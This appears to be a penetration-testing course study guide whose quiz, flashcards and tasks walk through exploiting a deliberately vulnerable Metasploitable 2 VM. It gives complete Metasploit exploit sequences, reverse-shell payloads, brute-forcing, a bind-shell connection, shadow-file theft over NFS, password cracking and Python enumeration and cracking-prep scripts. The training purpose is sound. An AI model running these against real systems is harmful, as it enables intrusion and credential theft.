Attacker Techniques with Metasploit

Questions and Answers

Which of the following best describes the primary function of the Metasploit Framework?

  • A database of known system vulnerabilities.
  • A method for securely patching operating system vulnerabilities.
  • A collection of penetration-testing tools used to exploit vulnerabilities. (correct)
  • A tool for creating virtual machines with security vulnerabilities.

What primary action does a Metasploit 'exploit' module perform?

  • Takes advantage of a known vulnerability to install a payload. (correct)
  • Analyzes network traffic for malicious activity.
  • Blocks unauthorized access attempts to a system.
  • Encrypts data transmitted across a network.

In Metasploit terminology, what is the purpose of a 'payload'?

  • To provide initial access to a target system via various methods. (correct)
  • To encrypt communications between systems.
  • To scan a system for open ports and services.
  • To identify software versions.

What is the main purpose of Metasploitable 2 in a penetration testing environment?

  • It acts as a deliberately vulnerable target for testing exploits. (correct)

Why should one exercise caution when downloading exploits from sources other than the Offensive Security Exploit Database?

  • Exploits from unofficial sources may contain malicious code. (correct)

In the Metasploit console, what is the function of the back command?

  • It leaves the current module and returns the prompt to the previous context. (correct)

What is a Common Vulnerabilities and Exposures (CVE) identifier?

  • A unique identifier assigned to a publicly known vulnerability. (correct)

What is the primary function of vulnerability databases in penetration testing?

  • To provide a record of known vulnerabilities for researching potential exploits. (correct)

What is the purpose of the Searchsploit tool in Kali Linux?

  • To search an offline copy of the Exploit Database for known exploits. (correct)

After identifying open ports and services, what is the next logical step in a penetration test?

  • Conducting vulnerability analysis to find potential exploits. (correct)

In the command ping <ip address>, what does the <ip address> argument represent?

  • The IP address of the target machine. (correct)

What command is used to access the Metasploit console in Kali Linux?

  • msfconsole (correct)

In Metasploit, after selecting an exploit, what command displays the configurable options for that module?

  • show options (correct)

What is the purpose of the command set rhosts <ip address> in Metasploit?

  • To specify the IP address of the target system. (correct)

What command is executed in Metasploit to initiate an exploit after configuring its options?

  • exploit (correct)

After successfully exploiting a target with Metasploit and obtaining a shell, what commands can be used to gather information about the compromised system?

  • ifconfig and whoami (correct)

Which tool is mentioned for brute-forcing password-protected services such as FTP, SSH, Telnet, and MySQL?

  • Hydra (correct)

When using Hydra for brute-forcing, what type of files are used for username and password lists?

  • Plain text files, one entry per line (correct)

What Metasploit module is used to perform brute-force login attempts against SSH?

  • auxiliary/scanner/ssh/ssh_login (correct)

What is the purpose of the sessions command in Metasploit?

  • To list, manage and interact with active sessions, whether plain shells or Meterpreter. (correct)

What is the purpose of the smtp-user-enum tool?

  • To check whether a username exists on a target mail server (via SMTP VRFY, EXPN or RCPT TO). (correct)

What is PHP mainly used for?

  • A scripting language used extensively in server-side web development. (correct)

What is Samba primarily used for?

  • File and printer sharing between networked computers, as the open-source implementation of the SMB/CIFS protocol. (correct)

What are Java classes mainly used for?

  • Constructing objects with attributes and methods. (correct)

What networking tool can be used for raw TCP port connections?

  • Netcat (correct)

What is the command showmount -e <ip address> primarily used for?

  • To list the NFS exports of the Metasploitable 2 VM. (correct)

What does SQL extract, create or modify?

  • Structured data in MySQL tables. (correct)

What is the purpose of VNC?

  • Graphical desktop sharing. (correct)

What is UnrealIRCd?

  • An Internet Relay Chat (IRC) server daemon. (correct)

After successfully mounting the target's file system via NFS, which command allows you to change the current directory to a specific location within the mounted file system?

  • cd (correct)

In a Linux system, which file typically contains a list of all user accounts on the system?

  • /etc/passwd (correct)

In a Linux system, which file stores the password hashes and is readable only by root?

  • /etc/shadow (correct)

What is the purpose of the john command?

  • Password cracking (correct)

After cracking the password hashes, which protocol does the material use to log in with a recovered password?

  • SSH (correct)

Flashcards

Metasploit Framework

An open-source penetration-testing framework bundled with the Kali VM, offering exploits for various applications, operating systems, and platforms.

Exploit

Code that takes advantage of a vulnerability to deliver a payload.

Payload

Code that runs on the target after exploitation and gives access, for example a reverse shell or Meterpreter.

Metasploit

A penetration-testing framework used to exploit vulnerabilities.

Metasploitable

A deliberately vulnerable Linux VM used as a practice target.

Meterpreter

A dynamically extensible Metasploit payload that runs in memory (on Windows via in-memory DLL injection) and offers a rich post-exploitation command set.

Vulnerability databases

Catalogues of known vulnerabilities in software and services, used to find candidate exploits.

Searchsploit

Kali command-line tool that searches a local, offline copy of the Exploit Database.

Hydra

Tool to brute-force password-protected services using username and password lists.

Smtp-user-enum

Checks whether accounts exist on a target mail server via SMTP VRFY, EXPN or RCPT TO.

mkdir /metafs

Creates a local mount point for the target's NFS export.

mount -t nfs <ip address>:/ /metafs -o nolock

Mounts the Metasploitable 2 root export at /metafs; nolock avoids needing a local lock daemon.

sudo john shadow.txt / sudo john --show shadow.txt

The first command cracks the password hashes in shadow.txt; --show prints the ones already cracked.

Study Notes

  • This activity guides you through an afternoon's practical session for identifying attacker techniques.
  • The practical session will cover Metasploit Framework/Meterpreter, Vulnerability Databases, Vulnerability Analysis and System Access, and Lateral Movement and Privilege Escalation.
  • You need a Kali VM as the attacking machine and a Metasploitable 2 VM as the target.
  • The Metasploitable 2 VM has intentional vulnerabilities for practicing exploit testing and enhancing penetration-testing skills.
  • Multiple methods may exist to exploit a vulnerability or achieve the same objective.

Recap on Active Reconnaissance

  • Active reconnaissance on the Metasploitable 2 VM provides information on open ports, running services, software versions, and the operating system.
  • The nmap service-version detection scan (nmap -sV <ip address>) reports which services and versions are listening.

Metasploit Framework

  • The Metasploit Framework (https://tools.kali.org/exploitation-tools/metasploit-framework) is bundled with the Kali VM and contains exploits for applications, OSes, and platforms.
  • It is started with the command msfconsole in the Kali terminal.
  • The six main Metasploit module types are Exploits, Payloads, Auxiliary, Nops, Post, and Encoders.
  • Exploits take advantage of vulnerabilities and deliver a payload.
  • Payloads provide access to a target, like a reverse shell or Meterpreter.
  • Auxiliary modules scan, fingerprint and brute-force but deliver no payload; several of the tasks below use them.
  • Metasploit is the attack framework; Metasploitable is a vulnerable Linux VM on which to test penetration-testing tools and skills.
  • References to Metasploit modules come up when searching vulnerability databases for known vulnerabilities.
  • Exploits not shipped with Metasploit may need to be downloaded and added to it.
  • To leave the current module and move up a level in the console, use back.
  • To exit Metasploit and return to the Kali terminal, use exit.
  • The target address option is RHOSTS; RHOST is accepted as an alias and option names are case-insensitive, so set rhosts, set rhost and set RHOSTS all set the same value.

Meterpreter

  • Meterpreter (Meta-Interpreter) is a dynamically extensible Metasploit payload: it runs on the target and loads further extensions over the session at runtime.
  • It provides an interactive command interface on the target, including file browsing and transfer, a system shell, screenshots and VNC-style screen control, and many post-exploitation commands.
  • Some exploits give only a plain command shell; such a session can be upgraded to Meterpreter with sessions -u <id>.
  • When you interact with a Meterpreter session the prompt changes from msf6 > to meterpreter >.

Vulnerability Databases

Searchsploit

  • Kali ships an offline copy of the Exploit Database; search it from the terminal with searchsploit <term>, for example searchsploit vsftpd 2.3.4.

Vulnerability Analysis & System Access - Kali and Metasploitable Setup

  • Log into the Kali VM using kali for both username and password.
  • Start the Metasploitable 2 VM and minimize it at the metasploitable login: prompt without logging in, to access it from the Kali VM.
  • Use the command ping <ip address> in Kali to check if the Metasploitable 2 VM is visible, and its address, adjusting network adapter settings to NAT if needed.

Task 1: Port 21 - vsftpd 2.3.4 Exploit

  • Port 21 is FTP; vsftpd stands for 'Very Secure FTP Daemon'.
  • Enter vsftpd 2.3.4 into the search bar on the Exploit Database website (https://www.exploit-db.com/) and pick the Metasploit module for the vsftpd 2.3.4 backdoor.
  • The 2.3.4 release was trojaned: a login whose username contains :) makes the server open a root shell listener on TCP port 6200. The Metasploit module triggers it over port 21 and then connects to that shell.
  • Access Metasploit from Kali with msfconsole.
  • Find the module with search vsftpd.
  • Load it with use exploit/unix/ftp/vsftpd_234_backdoor.
  • List the configuration options with show options.
  • Set the target address with set rhosts <ip address>.
  • Run the exploit with exploit.
  • The module triggers the backdoor and opens a command shell session on the Metasploitable 2 VM.
  • Run ifconfig and whoami to confirm where you are and with which privileges.
  • Type exit to close the shell session and then back to return to the main msf6 > prompt.

Task 2: Port 21 - Hydra

  • Hydra brute-forces services like FTP using username and password lists.
  • Create text files for the username (user.txt) and password (pass.txt) lists on the Kali desktop, one entry per line.
  • From a terminal in that directory run hydra -L user.txt -P pass.txt <ip address> ftp; every valid username/password pair found is printed.
  • Verify a hit by connecting with ftp <ip address> and logging in with the first credential found, msfadmin as both username and password.
  • Use exit to leave the FTP client and return to the Kali terminal prompt.

Task 3: Port 22 – SSH

  • The Metasploit auxiliary module ssh_login brute-forces SSH with the user.txt and pass.txt files made earlier and opens a session for each valid pair.
  • In msfconsole enter use auxiliary/scanner/ssh/ssh_login.
  • Use show options to see the available options.
  • Set rhosts <ip address>, user_file /home/kali/Desktop/user.txt and pass_file /home/kali/Desktop/pass.txt (option names are case-insensitive).
  • Start the module with run (exploit is accepted as an alias for auxiliary modules too).
  • List the sessions with sessions and attach to one with sessions -i <id>; ssh_login yields a command shell session, not Meterpreter.
  • Confirm location and privileges with ifconfig and whoami, then exit the shell and back to return to the main prompt.

Task 4: Port 23 – Linux telnetd

  • The Metasploit telnet_login module logs into Linux telnetd on port 23 the same way.
  • In msfconsole enter use auxiliary/scanner/telnet/telnet_login followed by show options.
  • Configure set rhosts <ip address>, set user_file /home/kali/Desktop/user.txt and set pass_file /home/kali/Desktop/pass.txt, then start it with run.
  • Attach to the resulting session with sessions -i <id> and confirm with ifconfig and whoami.

Task 5: Port 25 - SMTP User Enumeration

  • The Kali tool smtp-user-enum checks whether usernames exist on the target mail server; install it with sudo apt install smtp-user-enum.
  • Change directory to the Desktop and run smtp-user-enum -M VRFY -U user.txt -t <ip address>; names the server acknowledges (a 250 or 252 reply to VRFY) are reported as existing accounts.
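
The VRFY check that smtp-user-enum performs, written out so the reply codes it keys on are visible. This is an added example, not code from the lab page or from smtp-user-enum; the target host is an assumption, and the sample replies at the bottom are constructed to mirror the Postfix behaviour on Metasploitable 2 (252 for a known local user, 550 for an unknown one).

```python
"""Enumerate accounts over SMTP with VRFY, the check smtp-user-enum -M VRFY runs.

Added example, not code from the lab page or from smtp-user-enum. The target
host is an assumption; SAMPLE_REPLIES below is constructed, not captured.
"""
import socket

EXISTS, MISSING, UNSUPPORTED, UNKNOWN = "exists", "missing", "unsupported", "unknown"


def reply_code(reply: bytes) -> int:
    """Three-digit SMTP status code at the start of a reply, or -1."""
    try:
        return int(reply[:3])
    except ValueError:
        return -1


def reply_complete(data: bytes) -> bool:
    """True once data holds a whole reply: multi-line replies use 'NNN-' on
    every line but the last, which uses 'NNN '."""
    if not data.endswith(b"\r\n"):
        return False
    last = data[:-2].split(b"\r\n")[-1]
    return len(last) >= 4 and last[3:4] == b" "


def classify_vrfy(reply: bytes) -> str:
    """Map the reply to VRFY <user> to a verdict.

    250/251 confirm the user. 252 is 'cannot VRFY but will accept', which
    Postfix returns for local users while rejecting unknown ones with 550, so
    it counts as a hit here. A server that answers 252 for every name, or 502
    because VRFY is disabled, cannot be enumerated this way.
    """
    code = reply_code(reply)
    if code in (250, 251, 252):
        return EXISTS
    if code in (550, 551, 553):
        return MISSING
    if code in (500, 502, 503):
        return UNSUPPORTED
    return UNKNOWN


def read_reply(sock: socket.socket) -> bytes:
    """Read one complete (possibly multi-line) SMTP reply."""
    data = b""
    while not reply_complete(data):
        chunk = sock.recv(4096)
        if not chunk:
            break
        data += chunk
    return data


def enumerate_users(host: str, users, port: int = 25, timeout: float = 5.0) -> dict:
    """Run VRFY for each candidate over one SMTP session; returns user -> verdict."""
    results = {}
    with socket.create_connection((host, port), timeout=timeout) as s:
        read_reply(s)                         # 220 greeting
        s.sendall(b"HELO kali.local\r\n")
        read_reply(s)
        for user in users:
            s.sendall(b"VRFY " + user.encode() + b"\r\n")
            verdict = classify_vrfy(read_reply(s))
            results[user] = verdict
            if verdict == UNSUPPORTED:        # VRFY disabled: no point continuing
                break
        s.sendall(b"QUIT\r\n")
    return results


# Constructed sample replies, shaped like Postfix's answers; not captured from a host.
SAMPLE_REPLIES = {
    "root": b"252 2.0.0 root\r\n",
    "msfadmin": b"252 2.0.0 msfadmin\r\n",
    "nosuchuser": b"550 5.1.1 <nosuchuser>: Recipient address rejected: "
                  b"User unknown in local recipient table\r\n",
}


def classify_samples() -> dict:
    """Verdicts for the constructed replies; lets the classifier run offline."""
    return {user: classify_vrfy(reply) for user, reply in SAMPLE_REPLIES.items()}


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 2:                     # python3 vrfy_enum.py <ip address> user.txt
        with open(sys.argv[2]) as f:
            candidates = [line.strip() for line in f if line.strip()]
        found = enumerate_users(sys.argv[1], candidates)
    else:
        found = classify_samples()
    for user, verdict in found.items():
        print(f"{user:<16} {verdict}")
```

With no arguments it classifies the constructed replies; with a target and a user list it runs the live check. The UNSUPPORTED short-circuit matters in practice: once a server answers 502 to VRFY, switch smtp-user-enum to -M EXPN or -M RCPT rather than burning the rest of the list.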

Task 6: Port 80 – PHP CGI

  • PHP is a server-side web scripting language that can be embedded into HTML.
  • The Metasploitable 2 web server runs PHP as a CGI binary that mishandles query strings: an attacker can smuggle PHP interpreter options into a request and have the server execute attacker-supplied code (the PHP-CGI argument-injection flaw, CVE-2012-1823). The target is the server, not a browsing client.
  • Browse to port 80 by entering the Metasploitable IP address in the Kali web browser address bar.
  • To view the PHP version information, open /phpinfo.php.
  • Start Metasploit with msfconsole and enter the following in sequence:
    • use exploit/multi/http/php_cgi_arg_injection
    • set payload generic/shell_reverse_tcp
    • set rhosts <target ip address>
    • set lhost <your kali ip address>
    • exploit
  • A reverse shell connects back from the target to your Kali IP, which is why lhost must be set for this payload.
  • Run ls to confirm where the shell is, then press Ctrl-C and answer y to abort the session, and back to return to the main prompt.

Task 7: Ports 139 or 445 – Samba

  • Samba is the open-source implementation of the SMB/CIFS file- and print-sharing protocol used by networked computers. The Samba on Metasploitable 2 passes an unsanitised username to its 'username map script' setting, so shell metacharacters in the username become command injection (CVE-2007-2447, Samba 3.0.20 to 3.0.25rc3).
  • In msfconsole enter the following:
    • use exploit/multi/samba/usermap_script
    • set rhosts <ip address>
    • exploit
  • Confirm access with ifconfig and whoami; the shell runs as root.
  • Type exit to close the shell session and back to return to the main Metasploit prompt.

Task 8: Port 1099 – Java

  • The Java RMI registry on port 1099 is configured to load classes from a remote URL, which the java_rmi_server module abuses to run a Java payload:
    • use exploit/multi/misc/java_rmi_server
    • set rhosts <ip address>
    • exploit
  • The default payload is a Java Meterpreter, so confirm access with sysinfo.

Task 9: Port 1524 – Bindshell

  • Port 1524 on Metasploitable 2 runs a bind shell: a root shell bound to a TCP port that needs no exploit, only a connection.
  • Enter nc <ip address> 1524, then confirm with ifconfig and whoami.
  • Use exit to close the shell and return to the Kali terminal prompt.

Task 10: Port 2049 - nfs

  • showmount -e <ip address> lists the NFS exports of the target ("-e" for exports); Metasploitable 2 exports its root directory (/) to everyone.
  • Mount it on Kali (showmount and mount.nfs come from the nfs-common package if they are missing):
    • sudo mkdir /metafs
    • sudo mount -t nfs <ip address>:/ /metafs -o nolock
  • The target's whole filesystem is now readable under /metafs, including /metafs/etc/shadow, because the export does not squash root.

Task 11: Port 3306 – MySQL

  • Fingerprint the server first:
    • use auxiliary/scanner/mysql/mysql_version
    • set rhosts <ip address>
    • run
  • The MySQL root account on Metasploitable 2 has no password, so connect directly with mysql -u root -h <ip address> (if you add -p, press Enter at the empty password prompt).

Task 12: Port 5432 – Postgres

  • The postgres_payload module logs in with the default postgres:postgres credentials and uses the database's ability to load a shared library through CREATE FUNCTION to run a native payload:
    • use exploit/linux/postgres/postgres_payload
    • set rhosts <ip address>
    • exploit
  • Confirm access with sysinfo (the default payload is a Linux Meterpreter).

Task 13: Port 5900 – VNC

  • VNC on port 5900 is protected only by a password, which can be guessed:
    • use auxiliary/scanner/vnc/vnc_login
    • set rhosts <ip address>
    • run
  • The module reports the password it found; Metasploitable 2 ships with a weak one.
  • At the Kali terminal prompt enter vncviewer <ip address> and, when prompted, enter the password recovered by Metasploit.
  • The VNC session shows a desktop terminal on the Metasploitable 2 VM; run ifconfig and whoami there to confirm.

Task 14: Port 6667 – UnrealIRCD

  • UnrealIRCd 3.2.8.1 shipped with a backdoor: the archive on the project's mirrors was replaced with a trojaned copy in November 2009 and the compromise was not discovered until June 2010.
  • In msfconsole:
    • use exploit/unix/irc/unreal_ircd_3281_backdoor
    • set rhosts <ip address>
    • set payload cmd/unix/reverse
    • set lhost <kali ip address>
    • exploit
  • Confirm the result with ifconfig and whoami.

Task 15: Port 8180 – Apache Tomcat

  • Apache Tomcat's manager application on port 8180 accepts the default tomcat:tomcat login and lets an authenticated user deploy a WAR file, which the tomcat_mgr_upload module uses to deploy a payload:
    • use exploit/multi/http/tomcat_mgr_upload
    • set rhosts <ip address>
    • set rport 8180
    • set HttpUsername tomcat
    • set HttpPassword tomcat
    • exploit
  • Older Metasploit releases named these two options USERNAME and PASSWORD; check show options for the exact names in your version.
  • Confirm access with sysinfo and then getuid, which shows the account the payload runs as (the Tomcat service account, not root).

Lateral Movement & Privilege Escalation

  • After exploitation, gather what you need to move further: local accounts, password hashes and any credentials that also work on other services.
  • The NFS mount from Task 10 gives read access to the target's files without a shell: use cd and ls to browse, and ls -a to include hidden files.
  • cd /metafs/etc, then cat passwd to list the system's user accounts (passwd holds only an x in the password field; the hashes are not there).
  • The hashes are in shadow, which is readable only by root, so use sudo cat shadow (root on Kali is root on the export because it is not root-squashed).
  • Copy the shadow contents into a text editor on Kali and save it as shadow.txt on the Desktop.

Password Cracking

  • Crack the hashes with John the Ripper, then display the results:
    • cd ~/Desktop
    • sudo john shadow.txt
    • sudo john --show shadow.txt
  • Use a recovered password to log in over SSH as that user, for example ssh -l sys <ip address>.
  • Metasploitable 2 runs an old OpenSSH; if a current Kali client refuses with "no matching host key type found", add -oHostKeyAlgorithms=+ssh-rsa to the ssh command.
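
The merge of passwd and shadow that the john companion tool unshadow performs, plus a triage of which accounts are worth cracking first. This is an added example, not code from the lab page or from John the Ripper; the two sample files are constructed and shortened, and their hashes are placeholders of the right shape rather than real Metasploitable 2 hashes.

```python
"""Triage passwd and shadow copied off the NFS mount and build John's input.

Added example, not code from the lab page or from John the Ripper. The two
sample files are constructed; the hashes are placeholders, not real ones.
"""

# Constructed sample of /metafs/etc/passwd (shortened).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
"""

# Constructed sample of /metafs/etc/shadow; $1$ marks md5crypt hashes.
SAMPLE_SHADOW = """\
root:$1$saltsalt$AAAAAAAAAAAAAAAAAAAAA.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
sys:$1$saltsalt$BBBBBBBBBBBBBBBBBBBBB/:14742:0:99999:7:::
backup:!:14684:0:99999:7:::
msfadmin:$1$saltsalt$CCCCCCCCCCCCCCCCCCCCC1:14684:0:99999:7:::
"""

HASH_TYPES = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
              "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}


def parse_passwd(text: str) -> dict:
    """user -> {pw, uid, gid, gecos, home, shell} from passwd lines."""
    accounts = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, pw, uid, gid, gecos, home, shell = line.split(":", 6)
        accounts[name] = {"pw": pw, "uid": int(uid), "gid": int(gid),
                          "gecos": gecos, "home": home, "shell": shell}
    return accounts


def parse_shadow(text: str) -> dict:
    """user -> hash field from shadow lines (the remaining fields are aging data)."""
    hashes = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, hash_field = line.split(":", 2)[:2]
        hashes[name] = hash_field
    return hashes


def is_crackable(hash_field: str) -> bool:
    """Locked or passwordless entries ('*', '!', '!!', '' or a '!' prefix) give John nothing."""
    return bool(hash_field) and not hash_field.startswith("!") and hash_field != "*"


def hash_type(hash_field: str) -> str:
    """crypt(3) scheme from the $id$ prefix; 13 bare characters is traditional DES."""
    for prefix, name in HASH_TYPES.items():
        if hash_field.startswith(prefix):
            return name
    if len(hash_field) == 13 and "$" not in hash_field:
        return "descrypt"
    return "unknown"


def unshadow(passwd_text: str, shadow_text: str) -> list:
    """passwd lines with the x replaced by the shadow hash, as unshadow emits them."""
    hashes = parse_shadow(shadow_text)
    lines = []
    for name, acct in parse_passwd(passwd_text).items():
        pw = hashes.get(name, acct["pw"]) if acct["pw"] == "x" else acct["pw"]
        lines.append(":".join([name, pw, str(acct["uid"]), str(acct["gid"]),
                               acct["gecos"], acct["home"], acct["shell"]]))
    return lines


def triage(passwd_text: str, shadow_text: str) -> list:
    """Crackable accounts, uid 0 first then by uid, with hash type and shell."""
    hashes = parse_shadow(shadow_text)
    rows = []
    for name, acct in parse_passwd(passwd_text).items():
        h = hashes.get(name, acct["pw"] if acct["pw"] != "x" else "")
        if not is_crackable(h):
            continue
        rows.append({"user": name, "uid": acct["uid"], "shell": acct["shell"],
                     "type": hash_type(h), "root": acct["uid"] == 0})
    return sorted(rows, key=lambda r: (not r["root"], r["uid"]))


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:   # python3 triage.py passwd.txt shadow.txt > hashes.txt
        with open(sys.argv[1]) as f1, open(sys.argv[2]) as f2:
            passwd_text, shadow_text = f1.read(), f2.read()
    else:
        passwd_text, shadow_text = SAMPLE_PASSWD, SAMPLE_SHADOW
    for row in triage(passwd_text, shadow_text):
        print(f"{row['user']:<10} uid={row['uid']:<5} {row['type']:<12} {row['shell']}",
              file=sys.stderr)
    print("\n".join(unshadow(passwd_text, shadow_text)))
```

The merged output on stdout is what john expects, so the equivalent shell pipeline is unshadow passwd.txt shadow.txt > hashes.txt followed by john hashes.txt and john --show hashes.txt; feeding it the merged file rather than shadow.txt alone lets John report the uid and shell alongside each cracked password. The triage on stderr is the practitioner's shortcut: uid 0 and accounts with a real login shell are the ones worth the wordlist time, and locked entries ('*', '!') are skipped because they cannot produce a login however long John runs.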
